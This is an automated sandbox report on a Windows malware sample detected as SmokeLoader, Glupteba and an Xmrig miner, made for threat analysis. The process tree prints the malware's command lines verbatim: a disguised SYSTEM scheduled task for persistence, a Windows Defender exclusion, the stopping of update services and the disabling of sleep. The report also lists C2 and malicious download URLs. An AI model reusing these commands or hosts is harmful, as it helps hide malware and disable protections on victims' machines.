Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:1340695
MD5:e2982df7bd07c80ffdd02a7d680b64bc
SHA1:85d6417c7b391bea381eb07d56eff39efe051a04
SHA256:3fb42de7bef728db9db776ce892a5893f84b24c433253988d849c514a4008b67
Tags:exeSmokeLoader
Infos:

Detection

Glupteba, SmokeLoader, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Sigma detected: Stop multiple services
Yara detected SmokeLoader
Yara detected Glupteba
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Found Tor onion address
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sample is not signed and drops a device driver
Machine Learning detection for sample
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
DNS related to crypt mining pools
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Connects to a pastebin service (likely for C&C)
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if the current machine is a virtual machine (disk enumeration)
Uses powercfg.exe to modify the power settings
Modifies power options to not sleep / hibernate
Writes to foreign memory regions
Protects its processes via BreakOnTermination flag
Modifies the hosts file
Suspicious powershell command line found
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Creates driver files
Checks if the current process is being debugged
PE file contains more sections than normal
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Contains functionality to clear windows event logs (to hide its activities)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Found evaded block containing many API calls
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

  • System is w10x64
  • file.exe (PID: 5776 cmdline: C:\Users\user\Desktop\file.exe MD5: E2982DF7BD07C80FFDD02A7D680B64BC)
    • InstallSetup5.exe (PID: 4616 cmdline: "C:\Users\user\AppData\Local\Temp\InstallSetup5.exe" MD5: BC3354A4CD405A2F2F98E8B343A7D08D)
      • Broom.exe (PID: 3380 cmdline: C:\Users\user\AppData\Local\Temp\Broom.exe MD5: 00E93456AA5BCF9F60F84B0C0760A212)
    • toolspub2.exe (PID: 2012 cmdline: "C:\Users\user\AppData\Local\Temp\toolspub2.exe" MD5: DCBD05276D11111F2DD2A7EDF52E3386)
      • toolspub2.exe (PID: 1020 cmdline: "C:\Users\user\AppData\Local\Temp\toolspub2.exe" MD5: DCBD05276D11111F2DD2A7EDF52E3386)
        • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
          • cmd.exe (PID: 2532 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powercfg.exe (PID: 4620 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
            • powercfg.exe (PID: 1424 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
            • powercfg.exe (PID: 4072 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
            • powercfg.exe (PID: 4904 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • powershell.exe (PID: 4928 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 1484 cmdline: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 1172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1616 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5944 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5332 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powercfg.exe (PID: 6404 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
            • powercfg.exe (PID: 7152 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
            • powercfg.exe (PID: 6812 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
            • powercfg.exe (PID: 7116 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • powershell.exe (PID: 4340 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 2156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 6888 cmdline: C:\Windows\System32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2532 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • explorer.exe (PID: 880 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
          • powershell.exe (PID: 4132 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mgttsuddg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • e0cbefcb1af40c7d4aff4aca26621a98.exe (PID: 3392 cmdline: "C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe" MD5: 2A92DBDA3DF9502DEF5E1C9009950699)
      • powershell.exe (PID: 2736 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • e0cbefcb1af40c7d4aff4aca26621a98.exe (PID: 2032 cmdline: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe MD5: 2A92DBDA3DF9502DEF5E1C9009950699)
        • powershell.exe (PID: 5172 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • latestX.exe (PID: 4024 cmdline: "C:\Users\user\AppData\Local\Temp\latestX.exe" MD5: BAE29E49E8190BFBBF0D77FFAB8DE59D)
  • powershell.exe (PID: 6060 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • TrustedInstaller.exe (PID: 2436 cmdline: C:\Windows\servicing\TrustedInstaller.exe MD5: D098F2FC042FBF6879D47E3A86FBB4A1)
  • svchost.exe (PID: 5224 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cmd.exe (PID: 6264 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6092 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 5720 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 6732 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 5932 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 5944 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5268 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • sc.exe (PID: 1008 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • sc.exe (PID: 1540 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • sc.exe (PID: 2996 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • sc.exe (PID: 4000 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • updater.exe (PID: 6820 cmdline: C:\Program Files\Google\Chrome\updater.exe MD5: BAE29E49E8190BFBBF0D77FFAB8DE59D)
  • cdttvvc (PID: 3492 cmdline: C:\Users\user\AppData\Roaming\cdttvvc MD5: DCBD05276D11111F2DD2A7EDF52E3386)
    • cdttvvc (PID: 6044 cmdline: C:\Users\user\AppData\Roaming\cdttvvc MD5: DCBD05276D11111F2DD2A7EDF52E3386)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
GluptebaGlupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
{"Version": 2020, "C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
SourceRuleDescriptionAuthorStrings
file.exeMALWARE_Win_DLInjector04Detects downloader / injectorditekSHen
  • 0xc926dd:$s1: Runner
  • 0xc92842:$s3: RunOnStartup
  • 0xc926f1:$a1: Antis
  • 0xc9271e:$a2: antiVM
  • 0xc92725:$a3: antiSandbox
  • 0xc92731:$a4: antiDebug
  • 0xc9273b:$a5: antiEmulator
  • 0xc92748:$a6: enablePersistence
  • 0xc9275a:$a7: enableFakeError
  • 0xc9286b:$a8: DetectVirtualMachine
  • 0xc92890:$a9: DetectSandboxie
  • 0xc928bb:$a10: DetectDebugger
  • 0xc928ca:$a11: CheckEmulator
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\Broom.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\Windows\Temp\whxcdqscjswq.tmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        C:\Windows\Temp\whxcdqscjswq.tmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x4cb268:$a1: mining.set_target
        • 0x4c6a48:$a2: XMRIG_HOSTNAME
        • 0x4c8540:$a3: Usage: xmrig [OPTIONS]
        • 0x4c6a20:$a4: XMRIG_VERSION
        C:\Windows\Temp\whxcdqscjswq.tmpMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
        • 0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
        C:\Windows\Temp\whxcdqscjswq.tmpMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
        • 0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu
        • 0x4d1fc8:$s3: \\.\WinRing0_
        • 0x4ca4c8:$s4: pool_wallet
        • 0x4c62d0:$s5: cryptonight
        • 0x4c62e0:$s5: cryptonight
        • 0x4c62f0:$s5: cryptonight
        • 0x4c6300:$s5: cryptonight
        • 0x4c6318:$s5: cryptonight
        • 0x4c6328:$s5: cryptonight
        • 0x4c6338:$s5: cryptonight
        • 0x4c6350:$s5: cryptonight
        • 0x4c6360:$s5: cryptonight
        • 0x4c6378:$s5: cryptonight
        • 0x4c6390:$s5: cryptonight
        • 0x4c63a0:$s5: cryptonight
        • 0x4c63b0:$s5: cryptonight
        • 0x4c63c0:$s5: cryptonight
        • 0x4c63d8:$s5: cryptonight
        • 0x4c63f0:$s5: cryptonight
        • 0x4c6400:$s5: cryptonight
        • 0x4c6410:$s5: cryptonight
        SourceRuleDescriptionAuthorStrings
        0000003F.00000002.4558997865.0000000000D5E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          0000003F.00000003.2708781420.0000000000D7C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            0000003F.00000003.2708852084.0000000001958000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              0000003B.00000002.2612282713.00000000004C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                0000003B.00000002.2612282713.00000000004C0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
                • 0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
                Click to see the 32 entries
                SourceRuleDescriptionAuthorStrings
                57.2.cdttvvc.a515a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  9.2.toolspub2.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                    3.2.toolspub2.exe.8315a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                      59.2.cdttvvc.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                        39.2.updater.exe.7ff7fa9d7e20.1.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                          Click to see the 22 entries

                          Operating System Destruction

                          barindex
                          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 6264, ProcessName: cmd.exe
                          No Snort rule has matched

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: Yara matchFile source: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f70e67.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f10e67.14.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3800000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3860000.7.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000003.2270531809.0000000003C42000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.4560534739.0000000000843000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.4575750686.0000000003353000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: e0cbefcb1af40c7d4aff4aca26621a98.exe PID: 3392, type: MEMORYSTR
                          Source: http://host-host-file8.com/URL Reputation: Label: malware
                          Source: http://host-file-host6.com/URL Reputation: Label: malware
                          Source: https://allstatsin.ruAvira URL Cloud: Label: malware
                          Source: http://jesuscolin.top/syncUpd.exehttps://iplogger.com/1aiQK4SOFTWAREAvira URL Cloud: Label: malware
                          Source: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionAvira URL Cloud: Label: malware
                          Source: http://lazzarotata.icu/syncUpd.exedownload_quietAvira URL Cloud: Label: malware
                          Source: 0000003B.00000002.2612282713.00000000004C0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2020, "C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
                          Source: file.exeReversingLabs: Detection: 73%
                          Source: file.exeAvira: detected
                          Source: C:\Program Files\Google\Chrome\updater.exeReversingLabs: Detection: 71%
                          Source: C:\Users\user\AppData\Local\Temp\Broom.exeReversingLabs: Detection: 21%
                          Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeReversingLabs: Detection: 50%
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeReversingLabs: Detection: 47%
                          Source: C:\Users\user\AppData\Local\Temp\latestX.exeReversingLabs: Detection: 71%
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeReversingLabs: Detection: 34%
                          Source: C:\Users\user\AppData\Roaming\cdttvvcReversingLabs: Detection: 34%
                          Source: C:\Windows\Temp\whxcdqscjswq.tmpReversingLabs: Detection: 63%
                          Source: file.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\latestX.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeJoe Sandbox ML: detected
                          Source: C:\Program Files\Google\Chrome\updater.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Roaming\cdttvvcJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeJoe Sandbox ML: detected

                          Bitcoin Miner

                          barindex
                          Source: Yara matchFile source: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f70e67.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f10e67.14.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3800000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3860000.7.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000003.2270531809.0000000003C42000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.4560534739.0000000000843000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.4575750686.0000000003353000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: e0cbefcb1af40c7d4aff4aca26621a98.exe PID: 3392, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 39.2.updater.exe.7ff7fa9d7e20.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.updater.exe.7ff7fa990000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.updater.exe.7ff7fa9d4540.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.updater.exe.7ff7fa9d7e20.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000003F.00000002.4558997865.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003F.00000003.2708781420.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003F.00000003.2708852084.0000000001958000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003F.00000003.2684879397.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003F.00000002.4558997865.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003F.00000003.2708747670.0000000001975000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003F.00000003.2708491367.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003F.00000002.4572426073.0000000001950000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003F.00000003.2707785171.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003F.00000003.2708950297.0000000001963000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003F.00000002.4558997865.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.2684843852.00007FF7FA9B0000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003F.00000003.2708399343.0000000001979000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003F.00000003.2708993303.000000000196E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
